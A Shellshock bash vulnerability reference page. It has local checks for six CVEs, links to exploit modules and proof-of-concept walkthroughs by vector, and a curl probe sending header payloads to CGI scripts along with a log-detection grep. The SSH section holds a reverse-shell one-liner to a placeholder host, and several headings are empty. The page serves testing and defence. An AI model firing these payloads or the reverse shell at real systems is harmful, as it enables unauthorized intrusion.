Command Line (Linux, OSX, and Windows via Cygwin)
- bashcheck – script to test for the latest vulns
CVE-2014-6271
- env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id
CVE-2014-7169
will create a file named echo in cwd with date in it, if vulnerable
- env X='() { (a)=>\' bash -c "echo date"; cat echo
CVE-2014-7186
- bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
CVE-2014-7187
- (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
CVE-2014-6278
prints "hi mom" and runs id if vulnerable (delivered as the value of an environment variable, as in the env X='...' tests above)
- () { _; } >_[$($())] { echo hi mom; id; }
CVE-2014-6277
will segfault if vulnerable (same delivery: environment variable, then start a bash child)
- () { x() { _; }; x() { _; } <<a; }
- Additional discussion on fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9
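The command-line probes above, wrapped into one script so each check is a function that returns 0 when the interpreter is vulnerable and 1 when it is not. This is an added example, not the bashcheck script linked above; the variable BASH_UNDER_TEST is an assumption of this example (it names the bash binary to probe and defaults to the one on PATH), and the crash-based checks treat an exit status of 127 (binary not found) as "not vulnerable" rather than as a crash.

```shell
#!/bin/sh
# Added example (not the page's bashcheck script): the Shellshock probes
# from this section as functions. Each returns 0 = vulnerable, 1 = not.
# BASH_UNDER_TEST is an assumed variable naming the bash to probe.

BASH_UNDER_TEST="${BASH_UNDER_TEST:-bash}"

# Run a command, return 0 when it exited non-zero for a reason other than
# "not found" (127): the page's "|| echo vulnerable" tests, made safe.
fails_for_real() {
    rc=0
    "$@" >/dev/null 2>&1 || rc=$?
    [ "$rc" -ne 0 ] && [ "$rc" -ne 127 ]
}

# Run a command, return 0 when it was killed by a signal (status 128+N,
# 139 for SIGSEGV): the segfault-style tests.
crashes() {
    rc=0
    "$@" >/dev/null 2>&1 || rc=$?
    [ "$rc" -ge 128 ]
}

# CVE-2014-6271: code after a function definition held in an environment
# variable is executed when the child bash starts.
check_cve_2014_6271() {
    out=$(env X='() { :; }; echo vulnerable' "$BASH_UNDER_TEST" -c : 2>/dev/null || true)
    [ "$out" = "vulnerable" ]
}

# CVE-2014-7169: leftover parser state turns "echo date" into "date > echo",
# leaving a file named "echo" in the working directory.
check_cve_2014_7169() {
    dir=$(mktemp -d) || return 1
    ( cd "$dir" && env X='() { (a)=>\' "$BASH_UNDER_TEST" -c 'echo date' ) >/dev/null 2>&1 || true
    if [ -e "$dir/echo" ]; then rc=0; else rc=1; fi
    rm -rf "$dir"
    return "$rc"
}

# CVE-2014-7186: more here-documents on one command than redir_stack holds.
check_cve_2014_7186() {
    fails_for_real "$BASH_UNDER_TEST" -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF'
}

# Emit the 200-deep nested for-loop script used for CVE-2014-7187.
nested_for_loops() {
    i=1
    while [ "$i" -le 200 ]; do printf 'for x%d in ; do :\n' "$i"; i=$((i + 1)); done
    i=1
    while [ "$i" -le 200 ]; do printf 'done\n'; i=$((i + 1)); done
}

# CVE-2014-7187: word_lineno overflow when parsing the nested loops.
check_cve_2014_7187() {
    rc=0
    nested_for_loops | "$BASH_UNDER_TEST" >/dev/null 2>&1 || rc=$?
    [ "$rc" -ne 0 ] && [ "$rc" -ne 127 ]
}

# CVE-2014-6278: the trailing block still runs on bashes that only got
# the first two parser fixes.
check_cve_2014_6278() {
    out=$(env X='() { _; } >_[$($())] { echo vulnerable; }' "$BASH_UNDER_TEST" -c : 2>/dev/null || true)
    [ "$out" = "vulnerable" ]
}

# CVE-2014-6277: parser crash (SIGSEGV) on an unpatched bash.
check_cve_2014_6277() {
    crashes env X='() { x() { _; }; x() { _; } <<a; }' "$BASH_UNDER_TEST" -c :
}

# One line per CVE.
report() {
    for cve in 6271 7169 7186 7187 6278 6277; do
        if "check_cve_2014_$cve"; then
            echo "CVE-2014-$cve: VULNERABLE"
        else
            echo "CVE-2014-$cve: not vulnerable"
        fi
    done
}

report
```

Point BASH_UNDER_TEST at a specific binary (for example a vendor-supplied /bin/bash on a host you are auditing, or a copy pulled from a firmware image) when more than one bash is installed; the checks never rely on the shell that runs the script itself being bash, so the script can be driven from sh or dash.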
IBM z/OS
HTTP
- Metasploit Exploit Module Apache MOD_CGI – https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
- HTTP Header Pollution by @irsdl – http://pastebin.com/QNkf7dYS
- HTTP CGI-BIN – http://pastebin.com/166f8Rjx
- cPanel – http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
- Digital Alert Systems DASDEC – http://seclists.org/fulldisclosure/2014/Sep/107
- F5 – https://twitter.com/securifybv/status/515035044294172673
- Invisiblethreat.ca – https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
- Commandline version – https://gist.github.com/mfadzilr/70892f43597e7863a8dc
- User-Agent based walkthrough with LiveHTTPHeaders – http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/
- User-Agent based walkthrough with Burp – http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
- User-Agent via Curl with test server – http://shellshock.notsosecure.com/
- User-Agent based but supports Tor and Socks5 (Python) – https://github.com/lnxg33k/misc/blob/master/shellshock.py
- User-Agent based in Ruby – https://github.com/securusglobal/BadBash
- Header based simple scanner using sleep with multithread support – https://github.com/gry/shellshock-scanner
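What the User-Agent based tools above actually send, plus the matching log check, as an added example that is not one of the linked tools. It assumes the target URL you pass is a bash-backed CGI script under something like mod_cgi, which exports every request header as an HTTP_* environment variable; the sample access-log lines are constructed here, not real traffic.

```shell
#!/bin/sh
# Added example, not one of the scanners linked above.
# probe_cgi: the User-Agent/Referer/Cookie payload against an assumed CGI URL.
# probe_cgi_blind: timing variant for targets whose output never reaches the body.
# detect_in_log: the blue-team side, over constructed sample log lines.

# "echo; echo" emits the blank line that terminates the CGI header block,
# so the output of /bin/id lands in the HTTP body instead of causing a 500.
PAYLOAD='() { :; }; echo; echo; /bin/id'

probe_cgi() {    # usage: probe_cgi http://host/cgi-bin/test.cgi
    # The same string goes into several headers: mod_cgi exports each one as
    # HTTP_<NAME> and an unpatched bash parses every variable it inherits.
    curl -s -m 10 -A "$PAYLOAD" -H "Referer: $PAYLOAD" -H "Cookie: $PAYLOAD" "$1"
}

probe_cgi_blind() {    # usage: probe_cgi_blind URL; prints total seconds
    # Compare against a request without the payload: roughly +5 s means the
    # sleep ran, which is how the sleep-based scanners decide.
    curl -s -o /dev/null -m 20 -w '%{time_total}\n' \
        -A '() { :; }; /bin/sleep 5' "$1"
}

# Constructed sample access-log lines (combined log format), not real data.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 51 "-" "() { :; }; echo; echo; /bin/id"
198.51.100.7 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Sep/2014:10:02:10 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "() { :;}; /bin/sleep 10" "curl/7.37.0"'

# Print each log line from stdin carrying the function-definition prefix
# "() {" in any field (User-Agent, Referer, Cookie ...). The whitespace
# class also catches the spaceless "(){" variant.
detect_in_log() {
    grep -E '\(\)[[:space:]]*[{]'
}

# Number of flagged lines in the sample; 2 of the 3 lines above match.
count_flagged_sample() {
    printf '%s\n' "$SAMPLE_LOG" | detect_in_log | wc -l | tr -d ' '
}

count_flagged_sample
```

Run `detect_in_log < /var/log/apache2/access.log` (path assumed) to apply the same check to a real log; note that it only sees headers the server actually logs, so a payload delivered in Cookie or an unlogged custom header will not show up in a default combined-format log, which is one reason the blind timing probe exists on the attacker side.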
Phusion Passenger
DHCP
- Trusted sec exploitation via Tftpd32 – https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
- Metasploit Exploit Module – https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/dhcp/bash_environment.rb
- Metasploit Auxiliary Module – https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
- Perl Script – http://pastebin.com/S1WVzTv9
- using a Wi-Fi pineapple to force people to join the network – http://d.uijn.nl/?p=32
SSH
- Stack Overflow – http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
- SSH ForcedCommand – https://twitter.com/JZdziarski/status/515205581226123264
- SendEnv: LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_X (only reaches bash if the server's sshd_config has an AcceptEnv entry covering the name, e.g. LC_*, and the login shell or forced command is bash)
- Gitolite – https://twitter.com/Grifo/status/515089986161766400
- $ ssh [email protected] '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
- (requires a git account on the server; the requested command reaches the forced command as the SSH_ORIGINAL_COMMAND environment variable, which is where bash parses it)
OSX
- Priv Escalation via VMware Fusion – https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
- Fix: http://support.apple.com/kb/DL1769
SIP
- SIP Proxies: https://github.com/zaf/sipshock
Qmail
- Detailed walkthrough – http://marc.info/?l=qmail&m=141183309314366&w=2
- Tweet from @ymzkei5 – http://twitter.com/ymzkei5/status/515328039765307392
Postfix
FTP
OpenVPN
- OpenVPN – https://news.ycombinator.com/item?id=8385332
- PoC Walkthrough by @fj33r – http://sprunge.us/BGjP
Oracle
TMNT
Hand
- Via @DJManilaIce – http://pastie.org/9601055
Speculation (unconfirmed, possibly vulnerable):